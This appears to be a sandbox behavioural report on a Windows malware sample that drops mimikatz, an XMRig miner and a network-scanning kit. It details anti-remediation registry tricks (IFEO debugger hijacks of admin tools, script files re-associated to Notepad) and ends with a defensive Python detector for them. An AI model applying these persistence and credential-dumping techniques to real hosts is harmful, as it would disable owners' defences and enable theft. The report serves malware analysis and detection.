Analysis
max time kernel: 150s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20240426-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
submitted: 30/05/2024, 09:46
Behavioral task: behavioral1
Sample: 2024-05-30_f4da2f0ff1cb778434d64dbba8fcd89c_hacktools_icedid_mimikatz.exe
Resource: win7-20240508-en
General
Target: 2024-05-30_f4da2f0ff1cb778434d64dbba8fcd89c_hacktools_icedid_mimikatz.exe
Size: 7.9MB
MD5: f4da2f0ff1cb778434d64dbba8fcd89c
SHA1: e2d8451f12870e921ab2e08bb420b4f542b54700
SHA256: d7f9b7273a40afccbe578adeeadfb040a482b5d238b4a9d84123b4ac52304bc8
SHA512: c296fde35e3f75dadfd3db7a20b4a1155db80e127bb7ca61dd7f700d77890edb91da4a67da055d74c77e096a7777f3f3222070077dfeff6ea1e9ec62af1ff63d
SSDEEP: 196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description | pid | Process | procid_target
PID 316 created 1440 | 316 | vkdejee.exe | 37
Contacts a large (30893) number of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.

Creates a large number of network flows 1 TTPs
This may indicate a network scan to discover remotely running services. The volume is consistent with the scanning kit dropped under C:\Windows\umubtmbps\bbrcgicuu\ (scan.bat, ip.txt, Result.txt and wpcap.exe, which installs the WinPcap packet driver npf.sys listed below).
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
resource | yara_rule
behavioral2/memory/3132-137-0x00007FF723C70000-0x00007FF723D5E000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore
UPX dump on OEP (original entry point) 42 IoCs
resource | yara_rule
behavioral2/memory/2976-0-0x0000000000400000-0x0000000000A9B000-memory.dmp | UPX
behavioral2/memory/2976-4-0x0000000000400000-0x0000000000A9B000-memory.dmp | UPX
behavioral2/files/0x000700000002343f-6.dat | UPX
behavioral2/memory/5016-8-0x0000000000400000-0x0000000000A9B000-memory.dmp | UPX
behavioral2/files/0x0007000000023487-135.dat | UPX
behavioral2/memory/3132-136-0x00007FF723C70000-0x00007FF723D5E000-memory.dmp | UPX
behavioral2/memory/3132-137-0x00007FF723C70000-0x00007FF723D5E000-memory.dmp | UPX
behavioral2/files/0x0007000000023492-144.dat | UPX
behavioral2/memory/3540-145-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp | UPX
behavioral2/memory/3540-159-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp | UPX
behavioral2/files/0x000700000002348f-165.dat | UPX
behavioral2/memory/3492-168-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | UPX
behavioral2/memory/3112-174-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp | UPX
behavioral2/memory/4240-178-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp | UPX
behavioral2/memory/4724-182-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp | UPX
behavioral2/memory/3492-185-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | UPX
behavioral2/memory/3772-187-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp | UPX
behavioral2/memory/2708-191-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp | UPX
behavioral2/memory/4440-195-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp | UPX
behavioral2/memory/3492-197-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | UPX
behavioral2/memory/4464-200-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp | UPX
behavioral2/memory/3492-203-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | UPX
behavioral2/memory/1812-205-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp | UPX
behavioral2/memory/1036-209-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp | UPX
behavioral2/memory/2452-213-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp | UPX
behavioral2/memory/3492-215-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | UPX
behavioral2/memory/5040-218-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp | UPX
behavioral2/memory/392-222-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp | UPX
behavioral2/memory/3492-225-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | UPX
behavioral2/memory/1832-227-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp | UPX
behavioral2/memory/4268-230-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp | UPX
behavioral2/memory/5108-232-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp | UPX
behavioral2/memory/4060-234-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp | UPX
behavioral2/memory/3492-235-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | UPX
behavioral2/memory/4328-237-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp | UPX
behavioral2/memory/3492-249-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | UPX
behavioral2/memory/3492-250-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | UPX
behavioral2/memory/3492-253-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | UPX
behavioral2/memory/3492-305-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | UPX
behavioral2/memory/3492-312-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | UPX
behavioral2/memory/3492-314-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | UPX
behavioral2/memory/3492-329-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | UPX
Three distinct images are being unpacked here: the 32-bit 0x400000-0xA9B000 image (the sample and its copy vkdejee.exe, PIDs 2976 and 5016), the 0x00007FF653DA0000 image that recurs across the ibibzztte.exe PIDs, and the 0x00007FF6AB9B0000 image in PID 3492 (fpibei.exe), which is the one the xmrig rule matches below.
XMRig Miner payload 13 IoCs
resource | yara_rule
behavioral2/memory/3492-185-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | xmrig
behavioral2/memory/3492-197-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | xmrig
behavioral2/memory/3492-203-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | xmrig
behavioral2/memory/3492-215-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | xmrig
behavioral2/memory/3492-225-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | xmrig
behavioral2/memory/3492-235-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | xmrig
behavioral2/memory/3492-249-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | xmrig
behavioral2/memory/3492-250-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | xmrig
behavioral2/memory/3492-253-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | xmrig
behavioral2/memory/3492-305-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | xmrig
behavioral2/memory/3492-312-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | xmrig
behavioral2/memory/3492-314-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | xmrig
behavioral2/memory/3492-329-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | xmrig
All 13 hits are in PID 3492 (fpibei.exe, see Executes dropped EXE), the same process that requests SeLockMemoryPrivilege under AdjustPrivilegeToken below.
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource | yara_rule
behavioral2/memory/2976-0-0x0000000000400000-0x0000000000A9B000-memory.dmp | mimikatz
behavioral2/memory/2976-4-0x0000000000400000-0x0000000000A9B000-memory.dmp | mimikatz
behavioral2/files/0x000700000002343f-6.dat | mimikatz
behavioral2/memory/5016-8-0x0000000000400000-0x0000000000A9B000-memory.dmp | mimikatz
behavioral2/memory/3132-137-0x00007FF723C70000-0x00007FF723D5E000-memory.dmp | mimikatz
The rule fires on the submitted sample itself (PID 2976), on vkdejee.exe (PID 5016, dropped by the sample and sharing its 0x400000-0xA9B000 image range) and on vfshost.exe (PID 3132), the 64-bit binary that also matches the SQL-query rule above.
Drops file in Drivers directory 3 IoCs
description | ioc | Process
File opened for modification | C:\Windows\system32\drivers\etc\hosts | vkdejee.exe
File created | C:\Windows\system32\drivers\npf.sys | wpcap.exe
File created | C:\Windows\system32\drivers\etc\hosts | vkdejee.exe
npf.sys is the WinPcap NetGroup Packet Filter driver; together with the WinPcap files under Program Files and System32 below, wpcap.exe is a WinPcap installer run to give the scanner raw packet access.
Modifies Windows Firewall 2 TTPs 2 IoCs
pid | Process
4724 | netsh.exe
4452 | netsh.exe
Sets file execution options in registry 2 TTPs 40 IoCs
A Debugger value under Image File Execution Options\<image> makes Windows start the named "debugger" instead of <image>, with the original command line appended as arguments. Pointing it at svchost.exe replaces every listed tool with an svchost.exe instance that exits without doing anything, so the tool cannot be used to inspect or clean the host, whether run by an administrator, a cleanup script or competing malware.
description | ioc | Process
For each of the 20 images below, vkdejee.exe created the key \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<image> and set the value (str) <image>\Debugger = "C:\\Windows\\system32\\svchost.exe":
at.exe, bitsadmin.exe, certutil.exe, cscript.exe, icacls.exe, magnify.exe, mshta.exe, netsh.exe, perfmon.exe, powershell.exe, reg.exe, regini.exe, Regsvr32.exe, rundll32.exe, sethc.exe, takeown.exe, taskkill.exe, WinSAT.exe, WmiPrvSE.exe, wscript.exe
Executes dropped EXE 30 IoCs
pid | Process
5016, 316, 5000, 3876, 4736 | vkdejee.exe
3572 | wpcap.exe
2092 | pivnitiek.exe
3132 | vfshost.exe
652 | xohudmc.exe
3540, 3112, 4240, 4724, 3772, 2708, 4440, 4464, 1812, 1036, 2452, 5040, 392, 1832, 4268, 5108, 4060, 4328 | ibibzztte.exe (18 instances)
1452 | wokakm.exe
3492 | fpibei.exe
5024 | fuinnkdmr.exe
Loads dropped DLL 12 IoCs
pid | Process
3572 (×9) | wpcap.exe
2092 (×3) | pivnitiek.exe
resource | yara_rule
behavioral2/files/0x0007000000023487-135.dat | upx
behavioral2/memory/3132-136-0x00007FF723C70000-0x00007FF723D5E000-memory.dmp | upx
behavioral2/memory/3132-137-0x00007FF723C70000-0x00007FF723D5E000-memory.dmp | upx
behavioral2/files/0x0007000000023492-144.dat | upx
behavioral2/memory/3540-145-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp | upx
behavioral2/memory/3540-159-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp | upx
behavioral2/files/0x000700000002348f-165.dat | upx
behavioral2/memory/3492-168-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | upx
behavioral2/memory/3112-174-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp | upx
behavioral2/memory/4240-178-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp | upx
behavioral2/memory/4724-182-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp | upx
behavioral2/memory/3492-185-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | upx
behavioral2/memory/3772-187-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp | upx
behavioral2/memory/2708-191-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp | upx
behavioral2/memory/4440-195-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp | upx
behavioral2/memory/3492-197-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | upx
behavioral2/memory/4464-200-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp | upx
behavioral2/memory/3492-203-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | upx
behavioral2/memory/1812-205-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp | upx
behavioral2/memory/1036-209-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp | upx
behavioral2/memory/2452-213-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp | upx
behavioral2/memory/3492-215-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | upx
behavioral2/memory/5040-218-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp | upx
behavioral2/memory/392-222-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp | upx
behavioral2/memory/3492-225-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | upx
behavioral2/memory/1832-227-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp | upx
behavioral2/memory/4268-230-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp | upx
behavioral2/memory/5108-232-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp | upx
behavioral2/memory/4060-234-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp | upx
behavioral2/memory/3492-235-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | upx
behavioral2/memory/4328-237-0x00007FF653DA0000-0x00007FF653DFB000-memory.dmp | upx
behavioral2/memory/3492-249-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | upx
behavioral2/memory/3492-250-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | upx
behavioral2/memory/3492-253-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | upx
behavioral2/memory/3492-305-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | upx
behavioral2/memory/3492-312-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | upx
behavioral2/memory/3492-314-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | upx
behavioral2/memory/3492-329-0x00007FF6AB9B0000-0x00007FF6ABAD0000-memory.dmp | upx
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.

Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
66 | ifconfig.me
67 | ifconfig.me

Creates a Windows Service
Drops file in System32 directory 18 IoCs
description | ioc | Process
File created | C:\Windows\SysWOW64\{wpcap,Packet,pthreadVC}.dll | wpcap.exe
File created | C:\Windows\system32\{wpcap,Packet}.dll | wpcap.exe
File created | C:\Windows\SysWOW64\wokakm.exe | xohudmc.exe
File opened for modification | C:\Windows\SysWOW64\wokakm.exe | xohudmc.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | vkdejee.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | vkdejee.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | vkdejee.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\{103621DE9CD5414CC2538780B4B75751,2326C1864DE719190C396A6E8734D8B4} | vkdejee.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | vkdejee.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\{103621DE9CD5414CC2538780B4B75751,2326C1864DE719190C396A6E8734D8B4} | vkdejee.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | vkdejee.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | vkdejee.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | vkdejee.exe
The systemprofile paths are the CryptoAPI (CryptnetUrlCache) and WinINet (INetCache, INetCookies) caches of the LocalSystem account, written as a side effect of the 32-bit vkdejee.exe making web requests while running as SYSTEM; this is consistent with the ifconfig.me lookups above rather than a deliberate file drop.
Drops file in Program Files directory 3 IoCs
description | ioc | Process
File created | C:\Program Files\WinPcap\rpcapd.exe | wpcap.exe
File created | C:\Program Files\WinPcap\LICENSE | wpcap.exe
File created | C:\Program Files\WinPcap\uninstall.exe | wpcap.exe
Drops file in Windows directory 60 IoCs
description | ioc | Process
File created | C:\Windows\gibpmken\vkdejee.exe | 2024-05-30_f4da2f0ff1cb778434d64dbba8fcd89c_hacktools_icedid_mimikatz.exe
File opened for modification | C:\Windows\gibpmken\vkdejee.exe | 2024-05-30_f4da2f0ff1cb778434d64dbba8fcd89c_hacktools_icedid_mimikatz.exe
File created | C:\Windows\gibpmken\{schoedcl,svschost,vimpcsvc,docmicfg,spoolsrv}.xml | vkdejee.exe
File opened for modification | C:\Windows\gibpmken\{schoedcl,svschost,vimpcsvc,docmicfg,spoolsrv}.xml | vkdejee.exe
File created | C:\Windows\ime\vkdejee.exe | vkdejee.exe
File created | C:\Windows\umubtmbps\UnattendGC\{schoedcl,docmicfg,svschost,spoolsrv,vimpcsvc}.xml, Shellcode.ini, AppCapture32.dll, AppCapture64.dll | vkdejee.exe
File created | C:\Windows\umubtmbps\UnattendGC\specials\{spoolsrv,schoedcl,docmicfg,svschost,vimpcsvc}.{exe,xml} | vkdejee.exe
File created | C:\Windows\umubtmbps\UnattendGC\specials\{cnli-1,coli-0,crli-0,exma-1,posh-0,tibe-2,trch-1,trfo-2,tucl-1,ucl,xdvl-0,libeay32,ssleay32,libxml2,zlib1}.dll | vkdejee.exe
File created | C:\Windows\umubtmbps\Corporate\{mimidrv.sys,mimilib.dll,vfshost.exe} | vkdejee.exe
File opened for modification | C:\Windows\umubtmbps\Corporate\log.txt | cmd.exe
File created | C:\Windows\umubtmbps\bbrcgicuu\{pivnitiek.exe,fuinnkdmr.exe,wpcap.exe,wpcap.dll,Packet.dll,scan.bat,ip.txt} | vkdejee.exe
File opened for modification | C:\Windows\umubtmbps\bbrcgicuu\Packet.dll | vkdejee.exe
File opened for modification | C:\Windows\umubtmbps\bbrcgicuu\Result.txt | fuinnkdmr.exe
File created | C:\Windows\umubtmbps\upbdrjv\swrpwe.exe | vkdejee.exe
Corporate\ holds mimikatz components (mimidrv.sys is its kernel driver, mimilib.dll its helper DLL) next to vfshost.exe, which the mimikatz yara rule matches above. The DLL set in specials\ (cnli-1, coli-0, crli-0, exma-1, posh-0, tibe-2, trch-1, trfo-2, tucl-1, ucl, xdvl-0 with libeay32/ssleay32/libxml2/zlib1) matches the dependency libraries shipped with the leaked FuzzBunch exploit framework, and the five renamed .exe/.xml pairs follow that framework's module layout; this report only shows these files being written, not executed. bbrcgicuu\ is the scanning kit: the WinPcap libraries, wpcap.exe, scan.bat and the ip.txt/Result.txt files alongside it.
Launches sc.exe 4 IoCs
Sc.exe is a Windows utility to control services on the system.
pid | Process
3088 | sc.exe
4916 | sc.exe
4924 | sc.exe
860 | sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

NSIS installer 3 IoCs
resource | yara_rule
behavioral2/files/0x000700000002343f-6.dat | nsis_installer_2
behavioral2/files/0x000700000002344b-14.dat | nsis_installer_1
behavioral2/files/0x000700000002344b-14.dat | nsis_installer_2

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
1244 | schtasks.exe
3560 | schtasks.exe
5112 | schtasks.exe
Modifies data under HKEY_USERS 45 IoCs
Sysinternals tools record EULA acceptance under HKCU\Software\Sysinternals\<Tool>\EulaAccepted on first run, and HKU\.DEFAULT is the hive a process running as LocalSystem sees as HKCU. ibibzztte.exe writing ProcDump\EulaAccepted 18 times (once per instance, matching its 18 PIDs under Executes dropped EXE) therefore identifies it as a renamed copy of ProcDump running as SYSTEM.
description | ioc | Process
Key created (×18) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | ibibzztte.exe
Set value (int) (×18) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | ibibzztte.exe
Key created | \REGISTRY\USER\.DEFAULT\Software | ibibzztte.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals | ibibzztte.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | ibibzztte.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | vkdejee.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | vkdejee.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | vkdejee.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | vkdejee.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | vkdejee.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | vkdejee.exe
Modifies registry class 14 IoCs
Re-points the default handler (ProgID) of seven script extensions to "txtfile", so a .bat, .cmd, .js, .ps1, .reg, .vbe or .vbs opened from Explorer or via ShellExecute is shown in Notepad instead of being executed. Direct invocation through cmd.exe or the interpreter itself is unaffected, so the malware's own cmd.exe children keep working while cleanup scripts and rival droppers that rely on the association do not.
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\{.js,.ps1,.cmd,.vbs,.reg,.bat,.vbe}\ | vkdejee.exe
Set value (str) = "txtfile" | \REGISTRY\MACHINE\SOFTWARE\Classes\{.js,.cmd,.vbs,.VBE,.ps1,.bat,.reg}\ | vkdejee.exe
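The three registry tricks above (IFEO Debugger redirection, script extensions re-associated to txtfile, and a Sysinternals EULA accepted by a binary that is not the tool itself) can be pulled straight out of lines in this report's flattened format. The Python below is an added example written for this page, not code from the sandbox or from the sample. The line shapes it parses are the ones shown above; the SCRIPT_EXTS and KNOWN_DEBUGGERS sets are assumptions to tune for a given estate, and the last sample line is a constructed benign control that a developer machine might legitimately contain.

```python
"""Flag anti-remediation registry writes in sandbox IoC lines (added example)."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Line shapes used by the report. The process name is always the last token, and
# key paths may contain spaces ("Windows NT", "Image File Execution Options").
SET_RE = re.compile(r'^Set value \((?P<type>\w+)\) (?P<path>.+?) = "(?P<value>.*)" (?P<process>\S+)$')
KEY_RE = re.compile(r'^Key created (?P<path>.+) (?P<process>\S+)$')

IFEO_RE = re.compile(r'\\Image File Execution Options\\(?P<image>[^\\]+)\\Debugger$', re.I)
CLASS_RE = re.compile(r'\\SOFTWARE\\Classes\\(?P<ext>\.[^\\]+)\\?$', re.I)
EULA_RE = re.compile(r'\\Software\\Sysinternals\\(?P<tool>[^\\]+)\\EulaAccepted$', re.I)

# Extensions whose ProgID normally launches an interpreter; "txtfile" hands them to Notepad.
SCRIPT_EXTS = {'.bat', '.cmd', '.js', '.jse', '.ps1', '.reg', '.vbe', '.vbs', '.wsf'}
# Debugger images treated as plausibly legitimate (assumption: tune for your estate).
KNOWN_DEBUGGERS = {'vsjitdebugger.exe', 'windbg.exe', 'windbgx.exe', 'cdb.exe', 'ntsd.exe'}


@dataclass(frozen=True)
class RegEvent:
    op: str            # "set" or "key"
    path: str
    value: str | None  # only present for "set"
    process: str


@dataclass(frozen=True)
class Finding:
    rule: str
    subject: str
    process: str
    detail: str


def basename(path: str) -> str:
    return path.replace('/', '\\').rsplit('\\', 1)[-1].lower()


def parse_line(line: str) -> RegEvent | None:
    m = SET_RE.match(line.strip())
    if m:
        # The report doubles backslashes inside quoted string values; undo that.
        return RegEvent('set', m['path'], m['value'].replace('\\\\', '\\'), m['process'])
    m = KEY_RE.match(line.strip())
    if m:
        return RegEvent('key', m['path'], None, m['process'])
    return None


def classify(ev: RegEvent) -> Finding | None:
    if ev.op != 'set' or ev.value is None:
        return None  # a bare "Key created" is preparatory; the value write is the signal
    m = IFEO_RE.search(ev.path)
    if m and basename(ev.value) not in KNOWN_DEBUGGERS:
        return Finding('ifeo_debugger_hijack', m['image'], ev.process,
                       f'launching {m["image"]} now starts {ev.value} with the original command line appended')
    m = CLASS_RE.search(ev.path)
    if m and m['ext'].lower() in SCRIPT_EXTS and ev.value.lower() == 'txtfile':
        return Finding('script_assoc_neutralized', m['ext'].lower(), ev.process,
                       f'{m["ext"]} files opened from Explorer are shown as text instead of executed')
    m = EULA_RE.search(ev.path)
    if m and basename(ev.process) != m['tool'].lower() + '.exe':
        hive = ' under the SYSTEM (.DEFAULT) profile' if '\\USER\\.DEFAULT\\' in ev.path.upper() else ''
        return Finding('renamed_sysinternals_tool', m['tool'], ev.process,
                       f'{ev.process} accepted the {m["tool"]} EULA{hive}; likely a renamed copy')
    return None


def scan(lines) -> list[Finding]:
    findings = []
    for line in lines:
        ev = parse_line(line)
        if ev and (found := classify(ev)):
            findings.append(found)
    return findings


# Lines copied from the signatures above, plus one constructed benign control (a real
# debugger registered by a developer tool) to show what is deliberately not flagged.
SAMPLE_LINES = [
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe',
    r'Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe vkdejee.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" vkdejee.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" vkdejee.exe',
    r'Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe',
    r'Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" vkdejee.exe',
    r'Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ vkdejee.exe',
    # constructed control, not from the report:
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\myapp.exe\Debugger = "C:\\Windows\\system32\\vsjitdebugger.exe" devenv.exe',
]

if __name__ == '__main__':
    for f in scan(SAMPLE_LINES):
        print(f'{f.rule:28} {f.subject:12} {f.process:14} {f.detail}')
```

On a live host the same three rules map onto Sysmon Event ID 13 (registry value set), with TargetObject, Details and Image taking the place of path, value and process; the bare key creations are left unflagged on purpose, since the Debugger or default-value write is the actionable event.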
Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs
pid | Process
2916 | PING.EXE
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | Process
316 (×64) | vkdejee.exe
Suspicious behavior: LoadsDriver 15 IoCs
pid | Process
672 (×15) | Process not Found
The sandbox could not resolve PID 672. The driver files written during this run are npf.sys (WinPcap, see Drops file in Drivers directory) and mimidrv.sys (mimikatz, see Drops file in Windows directory).
Suspicious behavior: RenamesItself 1 IoCs
pid | Process
2976 | 2024-05-30_f4da2f0ff1cb778434d64dbba8fcd89c_hacktools_icedid_mimikatz.exe
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process
Token: SeDebugPrivilege 2976 2024-05-30_f4da2f0ff1cb778434d64dbba8fcd89c_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege 5016 vkdejee.exe
Token: SeDebugPrivilege 316 vkdejee.exe
Token: SeDebugPrivilege 3132 vfshost.exe
Token: SeDebugPrivilege 3540 ibibzztte.exe
Token: SeLockMemoryPrivilege 3492 fpibei.exe
Token: SeLockMemoryPrivilege 3492 fpibei.exe
Token: SeDebugPrivilege 3112 ibibzztte.exe
Token: SeDebugPrivilege 4240 ibibzztte.exe
Token: SeDebugPrivilege 4724 ibibzztte.exe
Token: SeDebugPrivilege 3772 ibibzztte.exe
Token: SeDebugPrivilege 2708 ibibzztte.exe
Token: SeDebugPrivilege 4440 ibibzztte.exe
Token: SeDebugPrivilege 4464 ibibzztte.exe
Token: SeDebugPrivilege 1812 ibibzztte.exe
Token: SeDebugPrivilege 1036 ibibzztte.exe
Token: SeDebugPrivilege 2452 ibibzztte.exe
Token: SeDebugPrivilege 5040 ibibzztte.exe
Token: SeDebugPrivilege 392 ibibzztte.exe
Token: SeDebugPrivilege 1832 ibibzztte.exe
Token: SeDebugPrivilege 4268 ibibzztte.exe
Token: SeDebugPrivilege 5108 ibibzztte.exe
Token: SeDebugPrivilege 4060 ibibzztte.exe
Token: SeDebugPrivilege 4328 ibibzztte.exe
-
Suspicious use of SetWindowsHookEx 14 IoCs
pid Process
2976 2024-05-30_f4da2f0ff1cb778434d64dbba8fcd89c_hacktools_icedid_mimikatz.exe
2976 2024-05-30_f4da2f0ff1cb778434d64dbba8fcd89c_hacktools_icedid_mimikatz.exe
5016 vkdejee.exe
5016 vkdejee.exe
316 vkdejee.exe
316 vkdejee.exe
652 xohudmc.exe
